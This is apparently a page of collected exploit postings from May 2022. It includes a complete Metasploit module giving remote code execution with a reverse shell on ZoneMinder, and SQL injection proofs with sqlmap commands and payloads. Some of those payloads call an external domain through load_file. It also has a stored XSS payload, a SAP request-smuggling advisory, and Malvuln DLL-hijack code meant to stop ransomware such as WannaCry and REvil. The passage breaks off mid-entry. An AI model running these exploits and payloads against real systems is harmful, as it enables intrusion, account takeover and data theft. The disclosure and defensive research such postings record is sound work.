<pre><code># Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection<br /># Date: 05/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /># Vulnerable Code<br /><br />line 4 in file "/simple_chat_bot/admin/responses/view_response.php"<br /><br />$qry = $conn->query("SELECT * from `response_list` where id = '{$_GET['id']}' ");<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/simple_chat_bot/admin/?id=0&page=responses/view_response' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=0' AND (SELECT 9931 FROM (SELECT(SLEEP(5)))Etug)-- bfDF&page=responses/view_response<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/0CFFEE266A8F14103158465E2ECDD2C1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Ransom.Cryptowall<br />Vulnerability: Code Execution<br />Description: Cryptowall looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Cryptowall<br />Type: PE32<br />MD5: 0CFFEE266A8F14103158465E2ECDD2C1<br />Vuln ID: MVID-2022-0584<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=6G06RCqGIT4<br /><br />Exploit/PoC:<br />1) Compile the following C code as "urlmon.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "urlmon.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln - 5/5/2022<br />//Purpose: <br />//gcc -c urlmon.c -m32<br />//gcc -shared -o urlmon.dll urlmon.o -m32<br /><br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ZoneMinder Language Settings Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits arbitrary file write in debug log file option<br /> chained with a path traversal in language settings that leads to a<br /> remote code execution in ZoneMinder surveillance software versions<br /> before 1.36.13 and before 1.37.11<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [ 'krastanoel' ], # Discovery and exploit<br /> 'References' => [<br /> [ 'CVE', '2022-29806' ],<br /> [ 'URL', 'https://krastanoel.com/cve/2022-29806']<br /> ],<br /> 'Platform' => ['php'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2022-04-27',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'Payload' => 'php/reverse_perl',<br /> 'Encoder' => 'php/base64'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),<br /> OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),<br /> OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET'<br /> )<br /> return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?<br /> return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200<br /><br /> if res.body =~ /ZoneMinder/<br /> csrf_magic = get_csrf_magic(res)<br /> res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/<br /> return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> else<br /> return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')<br /> end<br /><br /> res.body.match(/v(1.\d+.\d+)/)<br /> version = Regexp.last_match(1)<br /> unless version<br /> return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version')<br /> end<br /><br /> version = Rex::Version.new(version)<br /><br /> return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')<br /><br /> Exploit::CheckCode::Safe("Version Detected: #{version}")<br /> rescue ::Rex::ConnectionError<br /> return Exploit::CheckCode::Unknown('Could not connect to the web service')<br /> end<br /><br /> def exploit<br /> unless datastore['AutoCheck']<br /> cookie_jar.clear<br /> res = authenticate<br /> fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}<br /> end<br /><br /> vprint_status('Leak installation directory path')<br /> random_path = rand_text_alphanumeric(6..15)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'vars_get' => { 'view' => random_path }<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to leak install path') unless res<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'vars_get' => { 'view' => 'options' }<br /> )<br /><br /> csrf_magic = get_csrf_magic(res)<br /> current_lang = res&.get_html_document&.at(<br /> 'select[@name="newConfig[ZM_LANG_DEFAULT]"]<br /> option[@selected="selected"]'<br /> )&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil?<br /><br /> data = 'view=request&request=log&task=query&limit=10'<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?<br /><br /> res.body.match(/(\{"result":.*})/)<br /> request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access<br /> if request_log.key?(:rows) # Check for latest version key first v1.36.x<br /> request_log_key = 'rows'<br /> elsif request_log.key?(:logs)<br /> request_log_key = 'logs'<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')<br /> end<br /><br /> request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first<br /> if request_log<br /> path = request_log['File'].split('/')[0..-2].join('/')<br /> vprint_good("Path: #{path}")<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')<br /> end<br /><br /> fname = "#{rand_text_alphanumeric(6..15)}.php"<br /> traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join<br /> shell = "#{traverse_path}tmp/#{fname}"<br /> data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302<br /> vprint_good("Shell: #{shell}")<br /><br /> p = %(<?php #{payload.encoded} ?>)<br /> data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to receive a response') unless res<br /><br /> result = JSON.parse(res.body)['result']<br /> fail_with(Failure::UnexpectedReply, 'Failed to write payload') unless result<br /> fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'<br /><br /> # trigger the shell<br /> lang = shell.gsub(/\.php/, '')<br /> data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302<br /><br /> # cleanup<br /> data = Rack::Utils.parse_nested_query(data)<br /> data['newConfig']['ZM_LANG_DEFAULT'] = current_lang<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_query,<br /> 'keep_cookies' => true<br /> )<br /> vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200<br /><br /> data['tab'] = 'logging'<br /> data['newConfig']['ZM_LOG_DEBUG'] = 0<br /> data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_query,<br /> 'keep_cookies' => true<br /> )<br /> vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302<br /> rescue ::Rex::ConnectionError<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")<br /> end<br /><br /> private<br /><br /> def get_csrf_magic(res)<br /> return if res.nil?<br /><br /> res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text<br /> end<br /><br /> def authenticate(csrf_magic = nil)<br /> username = datastore['USERNAME']<br /> password = datastore['PASSWORD']<br /> data = "action=login&view=login&username=#{username}&password=#{password}"<br /> data += "&__csrf_magic=#{csrf_magic}" if csrf_magic<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/index.php'),<br /> 'data' => data.to_s,<br /> 'keep_cookies' => true<br /> })<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: PHProjekt (PhpSimplyGest / MyProjects, 1.3.0) - Stored XSS (Cross-Site Scripting)<br /># Date: 2022-05-05<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130)<br /># Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects)<br /># Version: 1.3<br /># Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32)<br /># CVE: CVE-2022-27308<br /><br /><br />Description:<br /><br />A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor, like "MyProjects") allows<br />attacker to execute arbitrary web scripts or HTML.<br /><br />Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard, estimates, report or finding,<br />it will be triggered once page gets loaded.<br /><br /><br />Steps to reproduce:<br /><br />Click on Projects and add or edit an existing one,<br /><br />Insert the following PoC inside the Title<br /><br /> <<SCRIPT>alert("XSS here");//\<</SCRIPT><br /><br />Click on 'Send'.<br /><br />If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.<br /><br /><br />Timeline:<br /><br />2022-01-08: Vulnerability discovered.<br />2022-01-08: Vendor contacted.<br />2022-02-09: No reply, vendor contacted for 2nd time.<br />2022-02-18: Request for CVE reservation.<br />2022-04-27: Assigned CVE number 2022-27308.<br />2022-05-02: No reply, vendor contacted for 3rd time.<br />2022-05-05: Public disclosure.<br /><br /><br />PoC Screenshots:<br /><br />https://imagebin.ca/v/6g5OFET1pyZB<br />https://imagebin.ca/v/6g6qLRC3X5ky<br />https://postimg.cc/qgc19rg0<br /><br /><br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0001: HTTP Request Smuggling in SAP Web<br />Dispatcher<br /><br />## Impact on Business<br /><br />By injecting an HTTP request as a prefix into a victim's request, a<br />malicious user<br />is able to cause damage in different ways, such as producing a Denial of<br />Service by<br />setting an invalid request as a prefix.<br /><br />It is also possible to inject a valid prefixed request that will include the<br />victim's information from its original request. This can be leveraged to<br />perform<br />malicious requests with the victim's credentials or information, or even<br />steal<br />user data.<br /><br />HTTP smuggling can also be combined with other vulnerabilities such as a<br />XSS or<br />reflected content (not vulnerability by itself), by injecting a request to<br />the<br />vulnerable application/web page as a prefix. If the attacker is able to set<br />the<br />prefix of the victim request and also knows a reflected XSS (it can also<br />work with<br />other content reflection), then the response will include a malicious<br />script that<br />will be executed on the victim's browser.<br /><br />This vulnerability is also useful to perform Web Cache Poisoning.<br />The HTTP caches in the different layers will see valid requests for which<br />the response<br />should be stored (considered static), but the actual request is modified by<br />the prefix<br />of the attacker to retrieve another resource, which should not be stored in<br />the cache.<br />As an example, if a user requests an image, the server will probably cache<br />the response as<br />the resource is static. However, if this request is prefixed by another<br />request which<br />returns sensible data, such as personal information, then this response<br />will be stored<br />in the cache. Therefore, when the attacker requests the same image, all the<br />victim's<br />personal information will be retrieved.<br /><br />Finally, a critical information disclosure could end up in session<br />hijacking and further<br />attacks. This can be performed by combining HTTP Desynchronization with<br />Open Redirect, and<br />use the victim's request as the parameter of the redirect location. This<br />would force the<br />victim to send its original request to the attacker, including critical<br />data such as session<br />cookies or query parameters.<br /><br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 04/05/2022<br />- Security Advisory ID: ONAPSIS-2022-0001<br />- Researcher(s): Martin Doyhenard, Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - KRNL64NUC 7.22, 7.22EXT, 7.49<br /> - KRNL64UC 7.22, 7.22EXT, 7.49, 7.53<br /> - WEBDISP 7.53, 7.77, 7.81<br /> - KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.83<br /><br /> (Check SAP Note 3080567 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-444<br />- CVSS v3 score: 8.9 AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L<br />- Risk Level: High<br />- Assigned CVE: CVE-2021-38162<br />- Vendor patch Information: SAP Security NOTE 3080567<br /><br /><br />## Affected Components Description<br /><br />The SAP Web dispatcher works as a frontend server between the Internet and<br />one or more<br />backend systems. Which consists of one or more SAP Netweaver ABAP, SAP<br />Netweaver<br />JAVA, SAP HANA, as well as third party application servers.<br /><br /><br />## Vulnerability Details<br /><br />An HTTP desynchronization vulnerability, TE.CL type is present in SAP Web<br />Dispatcher if the parameter ```wdisp/HTTP/use_pool_for_new_conn``` is<br />enabled.<br /><br />Pool connection related SAP Note :<br /><br /> * 2007212 - Tuning SAP Web Dispatcher and ICM for high load<br /><br /> * 953784 - SAP Web Dispatcher Connection Pooling<br /><br />If an attacker sends both HTTP headers "Content-Length" (CL) and<br />"Transfer-Encoding" (TE) in the same HTTP request, the SAP Webdispatcher<br />processes the TE header and treats the message body as using chunked<br />encoding.<br />This request is forwarded on to the SAP system ICM service, which processes<br />only<br />the CL header and determines the body size with it. The rest of the request<br />are<br />left unprocessed and the ICM will treat it as being the start of the next<br />request<br />in the sequence.<br /><br />This can be leveraged to gain control of requests issued by other users, and<br />even obtain sensitive information by retrieving the victim's requests and<br />responses.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3080567 which provides patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3080567.<br /><br />Onapsis strongly recommends SAP customers to download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 07/12/2021: Onapsis sends details to SAP<br /> - 07/12/2021: SAP provides internal ID<br /> - 08/09/2021: Vulnerability in progress<br /> - 09/14/2021: SAP releases SAP Note fixing the issue.<br /> - 05/04/2022: Advisory Published<br /><br /><br />## References<br /><br />- Onapsis blogpost:<br />https://www.onapsis.com/blog/sap-security-patch-day-september-2021<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38162<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3080567<br /><br /><br />## About Onapsis Research Labs<br /><br />Onapsis Research Labs provides the industry analysis of key security<br />issues that impact business-critical systems and applications.<br />Delivering frequent and timely security and compliance advisories with<br />associated risk levels, Onapsis Research Labs combine in-depth knowledge<br />and experience to deliver technical and business-context with sound<br />security judgment to the broader information security community.<br /><br />Find all reported vulnerabilities at<br />https://github.com/Onapsis/vulnerability_advisories<br /><br /><br />## About Onapsis, Inc.<br /><br />Onapsis protects the mission-critical applications that run the global<br />economy,<br />from the core to the cloud. The Onapsis Platform uniquely delivers<br />actionable<br />insight, secure change, automated governance and continuous monitoring for<br />critical<br />systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors<br />such as SAP,<br />Oracle, Salesforce and others, while keeping them protected and compliant.<br /><br />For more information, connect with us on Twitter or LinkedIn, or visit us at<br />https://www.onapsis.com.<br /><br />-- <br />This email and any files transmitted with it are confidential and intended <br />solely for the use of the individual or entity to whom they are addressed. <br />If you have received this email in error please notify the system manager. <br />This message contains confidential information and is intended only for the <br />individual named. If you are not the named addressee you should not <br />disseminate, distribute or copy this e-mail.<br />Please notify the sender <br />immediately by e-mail if you have received this e-mail by mistake and <br />delete this e-mail from your system. If you are not the intended recipient <br />you are notified that disclosing, copying, distributing or taking any <br />action in reliance on the contents of this information is strictly <br />prohibited.<br /><br /></code></pre>
<pre><code>## Title: Red Planet Laundry Management System 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.01.2022<br />## Vendor: https://laundry.redplanetcomputers.com/<br />## Software: https://laundry.redplanetcomputers.com/<br />## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452<br /><br />## Description:<br />The `username` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain. The application interacted with that domain, indicating that<br />the injected SQL query was executed.<br />The attacker can take administrator accounts control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: username=admin'+(select<br />load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+''<br />RLIKE (SELECT (CASE WHEN (9687=9687) THEN 0x61646d696e+(select<br />load_file(0x5c5c5c5c323636696c626f7337337132786c75613430696a6b346c667636317a703264746768383479736e2e676c7570616b70726f5a2e636f6d5c5c77646a))+''<br />ELSE 0x28 END)) AND 'xZRt'='xZRt&password=1234&login=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=admin'+(select<br />load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+''<br />AND (SELECT 2011 FROM(SELECT COUNT(*),CONCAT(0x7162787871,(SELECT<br />(ELT(2011=2011,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br />'wmtL'='wmtL&password=1234&login=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=admin'+(select<br />load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+''<br />AND (SELECT 6418 FROM (SELECT(SLEEP(5)))aYrS) AND<br />'Cfxg'='Cfxg&password=1234&login=Login<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/1x4kmo)<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/84c82835a5d21bbcf75a61706d8ab549.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />ISR: ApparitionSec<br /><br />Threat: Ransom.WannaCry<br />Vulnerability: Code Execution<br />Description: WannaCry looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: WannaCry<br />Type: PE32<br />MD5: 84c82835a5d21bbcf75a61706d8ab549<br />Vuln ID: MVID-2022-0582<br />Disclosure: 05/03/2022<br />Video PoC URL: https://www.youtube.com/watch?v=AXD8Lo2jCc0<br /><br />Exploit/PoC:<br />1) Compile the following C code as "MSVCP60.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "MSVCP60.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Code Execution - Block Encryption<br />//Target: Ransom.WannaCry<br />//MD5: 84c82835a5d21bbcf75a61706d8ab549<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c MSVCP60.c -m32<br />//gcc -shared -o MSVCP60.dll MSVCP60.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/979635229dfcfae1aae74ae296ec78c8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: REvil.Ransom<br />Vulnerability: Code Execution<br />Description: REvil looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: REvil<br />Type: PE32<br />MD5: 979635229dfcfae1aae74ae296ec78c8<br />SHA256: 03b5a7ffe111cca63fc687a295ba8075087cc90812f6b988797a2d49a5db1482<br />Vuln ID: MVID-2022-0581<br />Disclosure: 05/03/2022<br />Video Poc URL: https://www.youtube.com/watch?v=iN4WaVgEkvs<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "stdio.h"<br /><br />//By malvuln<br />//Purpose: Code Execution<br />//Target: REvil.Ransom<br />//MD5: 979635229dfcfae1aae74ae296ec78c8<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3c55ee6753408bff2e3e6a392ed9f2a0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Conti<br />Vulnerability: Code Execution<br />Description: Conti looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Conti<br />Type: PE32<br />MD5: 